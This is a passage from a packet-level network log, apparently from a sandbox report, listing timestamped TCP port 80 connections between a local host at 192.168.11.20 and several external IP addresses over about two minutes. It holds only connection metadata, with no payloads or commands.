Nov 12, 2024 15:30:59.138418913 CET	80	49735	208.91.197.27	192.168.11.20
Nov 12, 2024 15:31:04.169915915 CET	49736	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:04.348551989 CET	80	49736	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:04.348792076 CET	49736	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:04.363424063 CET	49736	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:04.543298006 CET	80	49736	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:04.558024883 CET	80	49736	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:04.558033943 CET	80	49736	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:04.558226109 CET	49736	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:05.875758886 CET	49736	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:06.893528938 CET	49737	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:07.077912092 CET	80	49737	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:07.078177929 CET	49737	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:07.085984945 CET	49737	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:07.268281937 CET	80	49737	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:07.284389973 CET	80	49737	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:07.284432888 CET	80	49737	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:07.284661055 CET	49737	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:08.593943119 CET	49737	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:09.611289978 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:09.790842056 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:09.790973902 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:09.799015045 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:09.799062014 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:09.799108028 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:09.997020960 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:09.997030020 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:09.997242928 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:09.997251987 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:10.014020920 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:10.014067888 CET	80	49738	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:10.014313936 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:11.311958075 CET	49738	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:12.329544067 CET	49739	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:12.496891022 CET	80	49739	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:12.497076035 CET	49739	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:12.503294945 CET	49739	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:12.674274921 CET	80	49739	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:12.685394049 CET	80	49739	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:12.685447931 CET	80	49739	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:12.685755014 CET	49739	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:12.687741041 CET	49739	80	192.168.11.20	203.161.49.193
Nov 12, 2024 15:31:12.855796099 CET	80	49739	203.161.49.193	192.168.11.20
Nov 12, 2024 15:31:17.873298883 CET	49740	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:18.009087086 CET	80	49740	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:18.009334087 CET	49740	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:18.017143011 CET	49740	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:18.151635885 CET	80	49740	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:18.151952028 CET	80	49740	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:18.152173996 CET	49740	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:19.529006958 CET	49740	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:19.663635015 CET	80	49740	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:20.546391010 CET	49741	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:20.683064938 CET	80	49741	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:20.683335066 CET	49741	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:20.691129923 CET	49741	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:20.824493885 CET	80	49741	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:20.831504107 CET	80	49741	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:20.831629038 CET	49741	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:22.200234890 CET	49741	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:22.333651066 CET	80	49741	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:23.217694998 CET	49742	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:23.352956057 CET	80	49742	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:23.353153944 CET	49742	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:23.361154079 CET	49742	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:23.361177921 CET	49742	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:23.361257076 CET	49742	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:23.498402119 CET	80	49742	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:23.498410940 CET	80	49742	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:23.498497009 CET	80	49742	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:23.498823881 CET	80	49742	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:25.891676903 CET	49743	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:26.027745962 CET	80	49743	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:26.027981997 CET	49743	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:26.033469915 CET	49743	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:26.168313026 CET	80	49743	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:26.173508883 CET	80	49743	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:26.173526049 CET	80	49743	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:26.173799992 CET	49743	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:26.175796986 CET	49743	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:31:26.310221910 CET	80	49743	13.248.169.48	192.168.11.20
Nov 12, 2024 15:31:31.382127047 CET	49744	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:31.515753031 CET	80	49744	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:31.515978098 CET	49744	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:31.523771048 CET	49744	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:31.657979012 CET	80	49744	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:31.657994032 CET	80	49744	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:31.658238888 CET	49744	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:33.026015043 CET	49744	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:34.045003891 CET	49745	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:34.179310083 CET	80	49745	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:34.179487944 CET	49745	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:34.188080072 CET	49745	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:34.322832108 CET	80	49745	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:34.322921038 CET	80	49745	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:34.323146105 CET	49745	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:35.697464943 CET	49745	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:36.714724064 CET	49746	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:36.848507881 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.848706007 CET	49746	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:36.856694937 CET	49746	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:36.856755018 CET	49746	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:36.990484953 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.990626097 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.990751028 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.990870953 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.991569042 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.991578102 CET	80	49746	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:36.991794109 CET	49746	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:38.368683100 CET	49746	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:39.386096954 CET	49747	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:39.519701958 CET	80	49747	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:39.519939899 CET	49747	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:39.525569916 CET	49747	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:39.659780025 CET	80	49747	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:39.659796953 CET	80	49747	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:39.660092115 CET	49747	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:39.662143946 CET	49747	80	192.168.11.20	173.255.194.134
Nov 12, 2024 15:31:39.795640945 CET	80	49747	173.255.194.134	192.168.11.20
Nov 12, 2024 15:31:44.851588011 CET	49748	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:44.968805075 CET	80	49748	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:44.969100952 CET	49748	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:44.980554104 CET	49748	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:45.097878933 CET	80	49748	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:45.115371943 CET	80	49748	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:45.115547895 CET	49748	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:46.491899014 CET	49748	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:46.609117031 CET	80	49748	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:47.509674072 CET	49749	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:47.626981020 CET	80	49749	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:47.627214909 CET	49749	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:47.635078907 CET	49749	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:47.752485991 CET	80	49749	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:47.770734072 CET	80	49749	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:47.770946980 CET	49749	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:49.147545099 CET	49749	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:49.264831066 CET	80	49749	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.164963961 CET	49750	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:50.282229900 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.282510042 CET	49750	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:50.291676044 CET	49750	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:50.291800976 CET	49750	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:50.408936024 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.409025908 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.409140110 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.409147978 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.409153938 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.409161091 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.409168959 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.428673983 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:50.428894043 CET	49750	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:51.803164005 CET	49750	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:51.920324087 CET	80	49750	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:52.820776939 CET	49751	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:52.938133001 CET	80	49751	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:52.938355923 CET	49751	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:52.944065094 CET	49751	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:53.061264038 CET	80	49751	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:53.081094980 CET	80	49751	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:53.081199884 CET	80	49751	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:53.081396103 CET	49751	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:53.083463907 CET	49751	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:53.086302996 CET	80	49751	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:53.086479902 CET	49751	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:31:53.200721979 CET	80	49751	3.33.130.190	192.168.11.20
Nov 12, 2024 15:31:58.307534933 CET	49752	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:31:58.548492908 CET	80	49752	84.32.84.32	192.168.11.20
Nov 12, 2024 15:31:58.548773050 CET	49752	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:31:58.556596041 CET	49752	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:31:58.797552109 CET	80	49752	84.32.84.32	192.168.11.20
Nov 12, 2024 15:31:58.798129082 CET	80	49752	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:01.084486008 CET	49753	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:01.321631908 CET	80	49753	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:01.321984053 CET	49753	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:01.329886913 CET	49753	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:01.567589045 CET	80	49753	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:01.567634106 CET	80	49753	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:03.849653959 CET	49754	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:04.085059881 CET	80	49754	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:04.085212946 CET	49754	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:04.094104052 CET	49754	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:04.094151974 CET	49754	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:04.094202042 CET	49754	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:04.094371080 CET	49754	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:04.329722881 CET	80	49754	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:04.329732895 CET	80	49754	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:04.330832958 CET	80	49754	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:06.614501953 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:06.854383945 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:06.854562044 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:06.859771013 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:07.099710941 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100400925 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100459099 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100505114 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100550890 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100594044 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100739956 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100749016 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100750923 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:07.100819111 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:07.100819111 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:07.100917101 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:07.100917101 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:07.104223013 CET	49755	80	192.168.11.20	84.32.84.32
Nov 12, 2024 15:32:07.345578909 CET	80	49755	84.32.84.32	192.168.11.20
Nov 12, 2024 15:32:12.275041103 CET	49756	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:12.392849922 CET	80	49756	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:12.393132925 CET	49756	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:12.400964022 CET	49756	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:12.518781900 CET	80	49756	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:12.533979893 CET	80	49756	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:12.534029007 CET	80	49756	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:12.534224987 CET	49756	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:13.907749891 CET	49756	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:14.927001953 CET	49757	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:15.044907093 CET	80	49757	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:15.045387983 CET	49757	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:15.058449984 CET	49757	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:15.176103115 CET	80	49757	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:15.183222055 CET	80	49757	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:15.183269024 CET	80	49757	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:15.183506012 CET	49757	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:16.563415051 CET	49757	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:17.581098080 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:17.698581934 CET	80	49758	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:17.698844910 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:17.714005947 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:17.714052916 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:17.714103937 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:17.831698895 CET	80	49758	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:17.840478897 CET	80	49758	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:17.840565920 CET	80	49758	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:17.840744972 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:19.219053984 CET	49758	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:20.236488104 CET	49759	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:20.353976965 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:20.354243994 CET	49759	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:20.360177040 CET	49759	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:20.477679968 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:20.485378981 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:20.485502005 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:20.485512018 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:20.485518932 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:20.485752106 CET	49759	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:20.487824917 CET	49759	80	192.168.11.20	108.179.252.152
Nov 12, 2024 15:32:20.605221987 CET	80	49759	108.179.252.152	192.168.11.20
Nov 12, 2024 15:32:25.697190046 CET	49760	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:25.831821918 CET	80	49760	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:25.832052946 CET	49760	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:25.839689970 CET	49760	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:25.973222971 CET	80	49760	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:25.973896980 CET	80	49760	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:25.974014997 CET	49760	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:27.342318058 CET	49760	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:27.476453066 CET	80	49760	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:28.359733105 CET	49761	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:28.503223896 CET	80	49761	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:28.503458023 CET	49761	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:28.511244059 CET	49761	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:28.652784109 CET	80	49761	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:28.652793884 CET	80	49761	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:28.652936935 CET	49761	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:30.013673067 CET	49761	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:30.150269985 CET	80	49761	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:31.031001091 CET	49762	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:31.169123888 CET	80	49762	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:31.169401884 CET	49762	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:31.178062916 CET	49762	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:31.178126097 CET	49762	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:31.314344883 CET	80	49762	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:31.314811945 CET	80	49762	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:33.702620983 CET	49763	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:33.836458921 CET	80	49763	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:33.836633921 CET	49763	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:33.841876984 CET	49763	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:33.974812031 CET	80	49763	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:33.976891994 CET	80	49763	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:33.976902008 CET	80	49763	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:33.977186918 CET	49763	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:33.979234934 CET	49763	80	192.168.11.20	13.248.169.48
Nov 12, 2024 15:32:34.112308979 CET	80	49763	13.248.169.48	192.168.11.20
Nov 12, 2024 15:32:39.215852976 CET	49764	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:39.351013899 CET	80	49764	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:39.351191044 CET	49764	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:39.359334946 CET	49764	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:39.496306896 CET	80	49764	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:39.496356964 CET	80	49764	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:39.496390104 CET	80	49764	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:39.496464014 CET	49764	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:39.496524096 CET	49764	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:40.871543884 CET	49764	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:41.887994051 CET	49765	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:42.028067112 CET	80	49765	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:42.028251886 CET	49765	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:42.036447048 CET	49765	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:42.173759937 CET	80	49765	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:42.173819065 CET	80	49765	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:42.173854113 CET	80	49765	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:42.174010992 CET	49765	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:43.541934013 CET	49765	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:44.559566021 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:44.680099010 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.680279970 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:44.689193010 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:44.689294100 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:44.806694984 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.806770086 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.806819916 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.806864977 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.806890011 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.806912899 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.806936979 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.824861050 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.824929953 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.824968100 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.825125933 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:44.829380035 CET	80	49766	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:44.829540968 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:46.197506905 CET	49766	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:47.214994907 CET	49767	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:47.350347996 CET	80	49767	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:47.350596905 CET	49767	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:47.355833054 CET	49767	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:47.490995884 CET	80	49767	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:47.491017103 CET	80	49767	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:47.491029978 CET	80	49767	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:47.491318941 CET	49767	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:47.493159056 CET	49767	80	192.168.11.20	199.59.243.227
Nov 12, 2024 15:32:47.627415895 CET	80	49767	199.59.243.227	192.168.11.20
Nov 12, 2024 15:32:52.709386110 CET	49768	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:52.826500893 CET	80	49768	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:52.826649904 CET	49768	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:52.842777014 CET	49768	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:52.959870100 CET	80	49768	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:52.979115009 CET	80	49768	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:52.979325056 CET	49768	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:54.351980925 CET	49768	80	192.168.11.20	3.33.130.190
Nov 12, 2024 15:32:54.470030069 CET	80	49768	3.33.130.190	192.168.11.20
Nov 12, 2024 15:32:55.369453907 CET	49769	80	192.168.11.20	3.33.130.190
